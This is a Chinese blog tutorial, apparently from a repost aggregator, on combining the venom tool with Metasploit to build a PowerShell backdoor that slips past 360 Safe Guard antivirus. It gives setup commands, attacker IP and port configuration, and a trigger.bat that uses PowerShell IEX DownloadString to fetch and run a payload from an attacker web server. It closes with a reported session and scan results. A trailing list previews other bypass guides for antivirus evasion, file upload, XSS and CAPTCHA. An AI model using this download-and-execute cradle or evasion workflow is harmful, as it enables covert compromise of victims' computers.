360safe.php绕过,venom结合Metasploit绕过360安全卫士
原理:msfvenom是msfpayload和msfencode的结合体,利用msfvenom生成shellcode,venom生成工具使用了
一些 Veil-Evasion.py, unicorn.py, powersploit.py 等工具上的技术。但是venom 是基于 bash 编写的,而不是
基于 Python。相比 veil evasion 在 payload 格式方面,它支持的更多[例如 .msi .hta .vbs .ps1 .dll.php .jar .pdf]而这些 veil evasion 都不支持。
1.从Github上下载框架,你可以下载到以下格式:tar.gz OR zipOR git clone2.赋予文件可执行权限:
cd venom-mainsudo chmod -R +x *.sh
sudo chmod -R +x *.py3.安装依赖关系包:
cd auxsudo ./setup.sh
4.运行sudo ./venom.sh
下载之后会得到一个zip的压缩包,我们用unzip解压即可
1、运行venom.sh之后我们可以看到msfvenom的界面是这样的:
2、上图这里的模块比较多,有/apk/exe/php/vbs/bat/ 等格式。在这里我以 11号 模块为例:
3、在下方输入 11 ,然后按回车键:
4、接下来会弹出一个窗口,要求你填写攻击者的 IP 、 端口以及后门名称:
5、在接下来我们要填写后门 选择监听模块类型:
选择完后点击确定
6、在目录我们可以查看 outoput 输出文件:
两个文件分别是 pitcoft.ps1和trigger.bat
8、这里选择msf的后门模块,选择完后会自动帮你设置相关参数:
好,我们看到我们的msf已经准备就绪了
9、下面,我们简单查看下 bat 文件的内容。这里需要我们把 pitcoft.ps1 文件,放到 web 服务器上。 让 powershell去远程下载木马文件:
1 :: powershell template | Author: r00t-3xp10it2 :: Matthew Graeber -DownloadString3 :: Download/execute payload inRAM4 :: ---
5 [url=home.php?mod=space&uid=46675]@echo[/url] off6 echo [*] Please wait, preparing software ...7 powershell.exe IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.105/pitcoft.ps1‘)
10、开启 kali 下的 apache 服务:
1 service apache2 start
11、将 pitcoft.ps1丢到 /var/www/ 目录下,以便让木马文件访问攻击者 web 地址:
12、我们只需要 trigger.bat 文件,到目标系统运行一次即可:
可以看到已经成功建立会话了。
最后我们来看一下我们的免杀问题
360安全卫士检测如下:
VirSCAN.org-多引擎在线扫描结果:
原文:http://www.cnblogs.com/Pitcoft/p/6309539.html
360safe.php绕过,venom结合Metasploit绕过360安全卫士相关推荐
- Shellcode免杀,绕过360安全卫士、火绒安全、腾讯管家
前言 分享一个傻瓜式直接套用大佬的框架进行shellcode免杀,自己还是萌新还需要学习很多东西,大佬们不喜勿喷 杀毒原理 360.腾讯电脑管家.火绒剑.金山毒霸.瑞星等等,这几个杀毒软件领头羊,现在 ...
- 00截断上传绕过_上传绕过总结
欢迎各位关注我的专栏,在以后的时间里,我将分享更多技术,在这里你能学到很多知识和姿势.自我介绍:高级安全研究员|擅长Python\PHP\JAVA审计;SONRT规则;etc.|陈小兵著<SQL ...
- xss绕过字符过滤_XSS绕过实战练习
前言 写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下.有些关卡不能再虚拟环境实践,我在自己物理机上找到那个xss挑战 ...
- php常见后缀绕过,文件包含漏洞(绕过姿势)
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接.但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识.俗话说,知己知彼方能百战不殆,因此 ...
- 通过cookie绕过验证码登录(绕过验证码)
通过cookie绕过验证码登录(绕过验证码) #!/user/bin/env python3 # -*- coding: utf-8 -*- from selenium import webdrive ...
- android 分享微信 不审核,ShareSDK Android 微信分享 绕过审核与不绕过审核
首先,微信在android平台有两种方式:一种是绕过审核分享,一种是不绕过审核分享. 绕过审核和不绕过审核的对比图如下: 1.微信好友对比图: 绕过审核分享分享给微信好友时看到的只是图片文件,显示的是 ...
- 360安全卫士举报360safe.exe?原来是在打假
一同事在检查电脑时发现360safe.exe被360安全卫士举报为伪装成360安全卫士的程序: 他以为大水冲了龙王庙,觉得不可思议,请我看看. 先看这个被举报为伪装成360安全卫士的程序360safe ...
- CPU漏洞修复工具下载,专门针对“Meltdown”(融化)和“Spectre”(幽灵)两组CPU漏洞,360安全卫士国内首发免疫工具
CPU漏洞免疫工具下载地址:http://down.360safe.com/cpuleak_scan.exe 这两组漏洞可能造成的危害: 这两组漏洞的利用依靠现代CPU普遍使用的推测执行特性(spec ...
- 深度调查:危险的“360安全卫士”!
[转]不管这是不是企业间的栽赃,至少,360绑架用户,我是亲身体会了的:开学的时候,我把电脑格式化了,然后重装系统,重装软件,为了方便,我下了360卫士,下载一些必备的软件,我知道360会诱导用户下载 ...
最新文章
- 还在傻傻分不清楚equal和==
- 真香!一行Python代码,帮你制作小姐姐的表情包,靠谱吗?
- Python基础——细琐知识点
- 记某CMS漏洞getshell
- 面向.NET开发人员的Dapr——入门
- 飞控计算机的作用,用于波音777飞机的主要飞控计算机
- java集合笔试编程题_Java 基础算法及编程笔试题集合
- android service 远程,android service(远程service) 知识点
- 排序算法:快速排序算法实现及分析(递归形式和非递归形式)
- 在 Panorama 页面中添加 ApplicationBar
- 小程序设置发送验证码倒计时
- 脉宽调制功能(PWM)
- unity material以及各种贴图介绍
- poco linux,centos7.2 安装poco
- 养老保险和住房公积金如何转移
- 粉丝投稿!分享自己的携程后台一面+二面+HR面,希望对大家有帮助!
- 某程序员上线原谅宝:抓取全球不可描述网站和社交平台10万渣女
- 48岁谷歌联合创始人布林再离婚,6000 亿财富或将分割
- 安装MySQL---已删除服务,却显示服务已存在
- android 自定view 网状结构图